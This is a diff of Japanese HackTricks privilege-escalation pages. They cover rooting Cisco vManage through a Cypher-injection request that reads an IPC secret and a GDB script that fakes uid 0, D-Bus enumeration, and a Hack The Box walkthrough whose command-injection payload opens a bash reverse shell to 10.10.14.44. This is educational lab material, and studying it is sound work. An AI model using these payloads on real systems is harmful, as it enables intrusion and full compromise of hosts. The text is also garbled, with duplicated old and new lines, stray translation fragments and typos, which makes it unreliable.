* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、当社の独占的な[NFTコレクション](https://opensea.io/collection/the-peass-family)
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
## パス1
(例[https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)からの例)
(例: [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))
`confd`および異なるバイナリに関連する[ドキュメント](http://66.218.245.39/doc/html/rn03re18.html)を少し掘り下げた後Ciscoのウェブサイトのアカウントでアクセス可能、IPCソケットを認証するために、`/etc/confd/confd_ipc_secret`にあるシークレットを使用することがわかりました。
`confd`および異なるバイナリに関連するいくつかの[ドキュメント](http://66.218.245.39/doc/html/rn03re18.html)を少し掘り下げた後、IPCソケットを認証するために使用される秘密が`/etc/confd/confd_ipc_secret`にあることがわかりました。
```
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
```
私たちのNeo4jインスタンスを覚えていますかそれは`vmanage`ユーザーの特権で実行されているため、前の脆弱性を利用してファイルを取得することができます。
以下は、ハッキング技術に関する内容です。ファイルlinux-hardening/privilege-escalation/cisco-vmanage.mdからのコンテンツです。
```md
Remember our Neo4j instance? It is running under the `vmanage` user's privileges, thus allowing us to retrieve the file using the previous vulnerability:
```
私たちのNeo4jインスタンスを覚えていますか それは`vmanage`ユーザーの特権で実行されているため、以前の脆弱性を使用してファイルを取得できます。
```
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
@ -34,7 +40,7 @@ Host: vmanage-XXXXXX.viptela.net
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
```
`confd_cli`プログラムはコマンドライン引数をサポートしていませんが、引数を指定して`/usr/bin/confd_cli_user`を呼び出します。したがって、独自の引数を指定して`/usr/bin/confd_cli_user`を直接呼び出すことができます。ただし、現在の権限では読み取ることができないため、rootfsから取得し、scpを使用してコピーし、ヘルプを読み取り、シェルを取得するために使用する必要があります。
`confd_cli`プログラムはコマンドライン引数をサポートしていませんが、`/usr/bin/confd_cli_user`を引数と共に呼び出します。したがって、独自の引数を使用して`/usr/bin/confd_cli_user`を直接呼び出すことができます。ただし、現在の権限では読み取ることができないため、rootfsから取得してscpを使用してコピーし、ヘルプを読んでシェルを取得する必要があります。
```
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
@ -54,11 +60,11 @@ uid=0(root) gid=0(root) groups=0(root)
```
## パス2
(例:[https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)からの例)
例:[https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)からの引用)
synacktivチームによるブログ¹では、ルートシェルを取得するためのエレガントな方法が説明されていますが、注意点として、ルートユーザーのみが読み取り可能な`/usr/bin/confd_cli_user`のコピーを取得する必要があります。私は、そのような手間をかけずにルートへの昇格方法を別の方法で見つけました。
synacktivチームによるブログ¹では、ルートシェルを取得するためのエレガントな方法が説明されていますが、注意点として、ルートのみが読み取り可能な`/usr/bin/confd_cli_user`のコピーを取得する必要があります。私は、そのような手間をかけずにルートに昇格する別の方法を見つけました。
`/usr/bin/confd_cli`バイナリを逆アセンブルしたところ、以下のことがわかりました:
`/usr/bin/confd_cli`バイナリを逆アセンブルしたところ、次のことが観察されました:
```
vmanage:~$ objdump -d /usr/bin/confd_cli
… snipped …
@ -87,20 +93,26 @@ vmanage:~$ objdump -d /usr/bin/confd_cli
4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt>
… snipped …
```
「ps aux」と実行すると、以下のような結果が表示されます_注意-g 100 -u 107_
When I run “ps aux”, I observed the following (_note -g 100 -u 107_)
---
日本語訳:
「ps aux」を実行すると、以下のように表示されました_note -g 100 -u 107_
```
vmanage:~$ ps aux
… snipped …
root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
… snipped …
```
私は、「confd_cli」プログラムがログインユーザーから収集したユーザーIDとグループIDを「cmdptywrapper」アプリケーションに渡すと仮定しました。
の仮説では、ログインユーザーから収集したユーザーIDとグループIDを「cmdptywrapper」アプリケーションに渡す「confd_cli」プログラムがあると考えました。
最初の試みは、「cmdptywrapper」を直接実行し、`-g 0 -u 0`を指定することでしたが、失敗しました。どこかでファイルディスクリプタ(-i 1015が作成され、それを偽装することができません。
最初の試みは、「cmdptywrapper」を直接実行し、`-g 0 -u 0`を指定して実行することでしたが、失敗しました。途中でファイルディスクリプタ(-i 1015が作成されたようで、それを偽装することができません。
synacktivのブログ最後の例述べられているように、「confd_cli」プログラムはコマンドライン引数をサポートしていませんが、デバッガを使用して影響を与えることができます。幸運なことに、システムにはGDBが含まれています。
synacktivのブログ最後の例言及されているように、`confd_cli`プログラムはコマンドライン引数をサポートしていませんが、デバッガを使用して影響を与えることができ、システムには幸運なことにGDBが含まれています。
私はGDBスクリプトを作成し、APIの「getuid」と「getgid」を0を返すように強制しました。既にシリアライズRCEを介して「vmanage」特権を持っているため、直接「/etc/confd/confd_ipc_secret」を読む権限があります。
私はGDBスクリプトを作成し、API `getuid`と`getgid`を強制的に0を返すようにしました。すでに逆シリアル化RCEを介して「vmanage」特権を持っているため、`/etc/confd/confd_ipc_secret`を直接読む権限があります。
root.gdb:
```
@ -120,7 +132,7 @@ root
end
run
```
コンソール出力
コンソール出力:
```
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
@ -158,10 +170,10 @@ bash-4.4#
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングのトリックを共有する**には、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSにアクセス**したいですかまたは、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、当社の独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクション
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

68
linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md
View file

@ -2,25 +2,25 @@
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでのAWSハッキング**を学びましょう</strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>こちら</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする
- **ハッキングトリックを共有するために、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見る
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
- **ハッキングトリックを共有するに、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください**
</details>
## **GUI列挙**
Ubuntuデスクトップ環境では、D-Busがプロセス間通信IPCの仲介者として使用されています。Ubuntuでは、複数のメッセージバスが同時に動作しており、システムバスは**特権のあるサービスがシステム全体で利用するサービスを公開する**ために主に使用され、ログインしているユーザーごとにセッションバスがあり、その特定のユーザーにのみ関連するサービスを公開します。ここでは、特権昇格を目的としているため、特権の高い権限たとえば、rootで実行されているサービス関連するシステムバスに焦点を当てています。D-Busのアーキテクチャでは、セッションバスごとに「ルーター」が使用され、クライアントメッセージをクライアントが通信したいサービスに基づいて適切なサービスにリダイレクトする責任があります。
Ubuntuデスクトップ環境では、D-Busがプロセス間通信IPCの仲介者として使用されています。Ubuntuでは、複数のメッセージバスが同時に動作しており、特権のあるサービスがシステム全体で関連するサービスを公開するために主に使用されるシステムバスと、ログインしている各ユーザーごとに公開されるその特定のユーザーに関連するサービスを公開するセッションバスが観察されます。ここでは、特権昇格を目的としているため、特にシステムバスに焦点を当てています。D-Busのアーキテクチャでは、セッションバスごとに「ルーター」が使用され、クライアントメッセージをクライアントが通信したいサービスに基づいて適切なサービスにリダイレクトする責任があります。
D-Bus上のサービスは、公開されている**オブジェクト**と**インターフェース**によって定義されます。オブジェクトは、標準のOOP言語のクラスインスタンスに似ており、各インスタンスは**オブジェクトパス**によって一意に識別されます。このパスは、ファイルシステムパスに似ており、サービスによって公開されている各オブジェクトを一意に識別します。研究目的で重要なインターフェースは、**org.freedesktop.DBus.Introspectable**インターフェースで、Introspectという単一のメソッドを備えています。このメソッドは、オブジェクトがサポートするメソッド、シグナル、およびプロパティのXML表現を返しますが、ここではプロパティとシグナルを省略してメソッドに焦点を当てています。
D-Bus上のサービスは、それらが公開する**オブジェクト**と**インターフェース**によって定義されます。オブジェクトは、標準のOOP言語のクラスインスタンスに似ており、各インスタンスは**オブジェクトパス**によって一意に識別されます。研究目的の主要なインターフェースは、**org.freedesktop.DBus.Introspectable**インターフェースで、単一のメソッドであるIntrospectを備えています。このメソッドは、オブジェクトがサポートするメソッド、シグナル、およびプロパティのXML表現を返しますが、ここではプロパティとシグナルを省略してメソッドに焦点を当てています。
D-Busインターフェースとの通信には、2つのツールが使用されました。スクリプトでD-Busによって公開されたメソッドを簡単に呼び出すためのCLIツールである**gdbus**と、PythonベースのGUIツールである[**D-Feet**](https://wiki.gnome.org/Apps/DFeet)です
D-Busインターフェースとの通信には、2つのツールが使用されましたスクリプトでD-Busに公開されたメソッドを簡単に呼び出すためのCLIツールである**gdbus**と、各バスで利用可能なサービスを列挙し、各サービスに含まれるオブジェクトを表示するために設計されたPythonベースのGUIツールである[**D-Feet**](https://wiki.gnome.org/Apps/DFeet)。
```bash
sudo apt-get install d-feet
```
@ -35,15 +35,15 @@ sudo apt-get install d-feet
**D-Feetはまたメソッドの呼び出しを許可**しますユーザーはPython式をパラメーターとして入力でき、D-FeetはこれをD-Busタイプに変換してからサービスに渡します。
ただし、**一部のメソッドは認証が必要**で、これらのメソッドを呼び出す前に認証が必要です。私たちの目標は、まず資格情報なしで特権を昇格させることなので、これらのメソッドは無視します。
ただし、**一部のメソッドは認証が必要**で、これらを呼び出す前に認証が必要です。私たちの目標は、まず資格情報なしで特権を昇格させることなので、これらのメソッドは無視します。
また、一部のサービスが、特定のアクションを実行してもよいかどうかをユーザーに許可するかどうかを判断するために、別のD-Busサービスであるorg.freedeskto.PolicyKit1をクエリすることに注意してください。
また、一部のサービスが、特定のアクションを実行することが許可されるべきかどうかをユーザーに尋ねる別のD-Busサービスであるorg.freedeskto.PolicyKit1をクエリすることに注意してください。
## **Cmd line列挙**
### サービスオブジェクトのリスト
D-Busインターフェースを開いたリストを次のように表示することができます:
D-Busインターフェースを開いたリストを次のようにしてリストアップすることができます:
```bash
busctl list #List D-Bus interfaces
@ -170,7 +170,7 @@ org.freedesktop.DBus.Properties interface - - -
**通信を監視**するには、**root**である必要があります。まだrootであることに問題がある場合は、[https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) と [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus) を確認してください。
{% hint style="warning" %}
D-Bus構成ファイルを構成して**非rootユーザーが通信をスニッフィング**できるようにする方法をご存知の場合は、**お知らせください**
D-Bus構成ファイルを設定して**非rootユーザーが通信をスニッフィング**できるようにする方法をご存知の場合は、**お知らせください**
{% endhint %}
監視するための異なる方法:
@ -179,7 +179,7 @@ sudo busctl monitor htb.oouch.Block #Monitor only specified
sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see
sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see
```
以下の例では、インターフェース`htb.oouch.Block`が監視され、**"**_**lalalalal**_**"**というメッセージが誤った通信経由で送信されます
以下の例では、インターフェース`htb.oouch.Block`が監視され、**"**_**lalalalal**_**"というメッセージが誤った通信経由で送信されます**:
```bash
busctl monitor htb.oouch.Block
@ -200,11 +200,11 @@ STRING "Carried out :D";
```
#### すべてのノイズをフィルタリングする <a href="#filtering_all_the_noise" id="filtering_all_the_noise"></a>
バス上に情報があふれている場合は、次のように一致ルールを渡します:
バス上に情報が多すぎる場合は、次のように一致ルールを渡します:
```bash
dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'"
```
複数のルールを指定できます。メッセージがルールのいずれかに一致すると、そのメッセージが表示されます。次のように:
複数のルールを指定できます。メッセージがいずれかのルールに一致する場合、そのメッセージが表示されます。以下のように:
```bash
dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
```
@ -220,7 +220,7 @@ dbus-monitor "type=method_call" "type=method_return" "type=error"
## **脆弱性シナリオ**
HTBのホスト"oouch"内のユーザー**qtc**として、_**/etc/dbus-1/system.d/htb.oouch.Block.conf**_ という予期しないD-Bus構成ファイルが見つかります。
HTBのホスト"oouch"内のユーザー**qtc**として、_/etc/dbus-1/system.d/htb.oouch.Block.conf_ にある**予期しないD-Bus構成ファイル**を見つけることができます。
```xml
<?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->
@ -243,7 +243,7 @@ HTBのホスト"oouch"内のユーザー**qtc**として、_**/etc/dbus-1/system
```
前の設定から、このD-BUS通信を介して情報を送受信するには、ユーザー`root`または`www-data`である必要があることに注意してください。
Dockerコンテナ**aeb4525789d8**内のユーザー**qtc**として、ファイル_/code/oouch/routes.py_でdbus関連のコードを見つけることができます。興味深いコードは次のとおりです:
Dockerコンテナ**aeb4525789d8**内のユーザー**qtc**として、ファイル_/code/oouch/routes.py_でいくつかのD-BUS関連コードを見つけることができます。興味深いコードは次のとおりです:
```python
if primitive_xss.search(form.textfield.data):
bus = dbus.SystemBus()
@ -257,12 +257,12 @@ return render_template('hacker.html', title='Hacker')
```
如何見て取れるように、**D-Busインターフェースに接続** し、"Block" 関数に "client\_ip" を送信しています。
D-Bus接続のもう一方には、いくつかのCコンパイルされたバイナリが実行されています。このコードは、D-Bus接続でIPアドレスを**リッスン**し、`system` 関数を介してiptablesを呼び出して、指定されたIPアドレスをブロックしています。\
**`system`への呼び出しは、意図的にコマンドインジェクションの脆弱性**を持っているため、次のようなペイロードがリバースシェルを作成します: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
D-Bus接続のもう一方には、実行中のいくつかのCコンパイルされたバイナリがあります。このコードは、D-Bus接続でIPアドレスを**リッスン**し、`system` 関数を介してiptablesを呼び出して、指定されたIPアドレスをブロックしています。\
**`system`への呼び出しは、意図的にコマンドインジェクションの脆弱性があります**、したがって、次のようなペイロードがリバースシェルを作成します: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
### 悪用方法
このページの最後に、D-Busアプリケーションの**完全なCコード**があります。その中には、**`D-Busオブジェクトパス`** と **`インターフェース名`** が **登録** されている91-97行の間に見つけることができます。この情報は、D-Bus接続に情報を送信するために必要になります
このページの最後に、D-Busアプリケーションの**完全なCコード**があります。その中には、**`D-Busオブジェクトパス`** と **`インターフェース名`** が **登録** されている91-97行の間に見つけることができます。この情報は、D-Bus接続に情報を送信するために必要になります
```c
/* Install the object */
r = sd_bus_add_object_vtable(bus,
@ -272,13 +272,13 @@ r = sd_bus_add_object_vtable(bus,
block_vtable,
NULL);
```
また、57行目では、このD-Bus通信に登録されている**唯一のメソッド**が`Block`と呼ばれていることがわかります_**そのため、次のセクションではペイロードがサービスオブジェクト`htb.oouch.Block`、インターフェース`/htb/oouch/Block`、およびメソッド名`Block`に送信されることになります**_:
また、57行目では、このD-Bus通信に登録されている**唯一のメソッド**が`Block`と呼ばれていることがわかります_**そのため、次のセクションではペイロードがサービスオブジェクト`htb.oouch.Block`、インターフェース`/htb/oouch/Block`、およびメソッド名`Block`に送信されることになります**_:
```c
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
```
#### Python
以下のPythonコードは、`block_iface.Block(runme)`を介して`Block`メソッドにペイロードをD-Bus接続に送信します_前のコードチャンクから抽出されたことに注意してください_:
以下のPythonコードは、`block_iface.Block(runme)`を介して`Block`メソッドにペイロードをD-Bus接続に送信します_前のコードチャンクから抽出されたものであることに注意してください_:
```python
import dbus
bus = dbus.SystemBus()
@ -293,13 +293,13 @@ bus.close()
dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'
```
* `dbus-send`は「メッセージバス」にメッセージを送信するためのツールです。
* メッセージバス - システム間の通信を容易にするためにシステムで使用されるソフトウェアです。メッセージキューに関連しています(メッセージは順番に並んでいます)が、メッセージバスではメッセージが購読モデルで送信され、非常に迅速です。
* 「-system」タグは、セッションメッセージではなくシステムメッセージであることを示すために使用されます(デフォルトでは)
* 「--print-reply」タグは、メッセージを適切に表示し、人間が読める形式で返信を受け取るために使用されます。
* 「--dest=Dbus-Interface-Block」はDbusインターフェースのアドレスです。
* 「--string:」- インターフェースに送信したいメッセージのタイプです。ダブル、バイト、ブール、整数、オブジェクトパスなど、メッセージを送信するためのいくつかのフォーマットがあります。このうち、「オブジェクトパス」は、ファイルのパスをDbusインターフェースに送信したい場合に便利です。この場合、特別なファイルFIFOを使用して、ファイルでインターフェースにコマンドを渡すことができます。「string:;」- これは、再びオブジェクトパスを呼び出すためのもので、FIFOリバースシェルファイル/コマンドの場所を置く場所です。
* メッセージバス - システム間の通信を容易にするためにシステムが使用するソフトウェアです。メッセージキューに関連しており、メッセージは順序付けられますが、メッセージバスではメッセージが購読モデルで送信され、非常に迅速です。
* "-system"タグは、デフォルトではなくシステムメッセージであることを示すために使用されます。
* "--print-reply"タグは、メッセージを適切に出力し、人間が読める形式で返信を受け取るために使用されます。
* "--dest=Dbus-Interface-Block" - Dbusインターフェースのアドレスです。
* "--string:" - インターフェースに送信したいメッセージのタイプです。ダブル、バイト、ブール値、整数、オブジェクトパスなど、いくつかの形式でメッセージを送信する方法があります。このうち、「オブジェクトパス」は、ファイルのパスをDbusインターフェースに送信したい場合に便利です。この場合、特別なファイルFIFOを使用して、ファイル名でインターフェースにコマンドを渡すことができます。"string:;" - これは、再びオブジェクトパスを呼び出すためのもので、FIFOリバースシェルファイル/コマンドの場所を置く場所です。
_`htb.oouch.Block.Block`では、最初の部分(`htb.oouch.Block`)がサービスオブジェクトを参照し、最後の部分(`.Block`がメソッド名を参照しています。_
_htb.oouch.Block.Block_では、最初の部分_htb.oouch.Block_がサービスオブジェクトを参照し、最後の部分_.Block_がメソッド名を参照しています。
### Cコード
@ -453,12 +453,12 @@ return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じてゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手す
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する。
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、**ハッキングトリックを共有**してください。
* **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f)または [**telegram グループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリに PR を提出して、あなたのハッキングトリックを共有してください。
</details>

326
linux-hardening/privilege-escalation/docker-security/README.md
View file

@ -1,65 +1,65 @@
# Docker セキュリティ
# Dockerセキュリティ
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有**してください。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**する
- **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で**最も先進的な**コミュニティツールを搭載した**ワークフローを簡単に構築し自動化**する。\
今すぐアクセス:
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**します。\
今すぐアクセスを取得
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## **基本的なDockerエンジンのセキュリティ**
## **基本的なDocker Engineセキュリティ**
Dockerエンジンは、コンテナの実行と管理を行う重要な役割を果たします。Dockerエンジンは、**Namespaces**や**Cgroups**などのLinuxカーネルの機能を使用して、コンテナ間で基本的な**隔離**を提供します。また、**Capabilities dropping**、**Seccomp**、**SELinux/AppArmor**などの機能を使用して、より良い隔離を実現します。
**Docker Engine**は、Linuxカーネルの**Namespaces**と**Cgroups**を使用してコンテナを分離し、基本的なセキュリティレイヤーを提供します。**Capabilities dropping**、**Seccomp**、**SELinux/AppArmor**によって追加の保護が提供され、コンテナの分離が強化されます。**認証プラグイン**を使用すると、ユーザーのアクションをさらに制限できます。
最後に、**認証プラグイン**を使用して、ユーザーが実行できるアクションを**制限**することができます。
![Dockerセキュリティ](https://sreeninet.files.wordpress.com/2016/03/dockersec1.png)
![](<../../../.gitbook/assets/image (625) (1) (1).png>)
### Docker Engineへの安全なアクセス
### **Dockerエンジンの安全なアクセス**
Docker Engineは、ローカルでUnixソケットを介してまたはHTTPを使用してリモートでアクセスできます。リモートアクセスの場合、機密性、整合性、および認証を確保するためにHTTPSと**TLS**を使用することが重要です。
Dockerクライアントは、Unixソケットを使用してローカルに、またはhttpメカニズムを使用してリモートにDockerエンジンにアクセスできます。リモートで使用するには、機密性、完全性、認証を確保するためにhttpsと**TLS**を使用する必要があります。
デフォルトではUnixソケット`unix:///var/`\
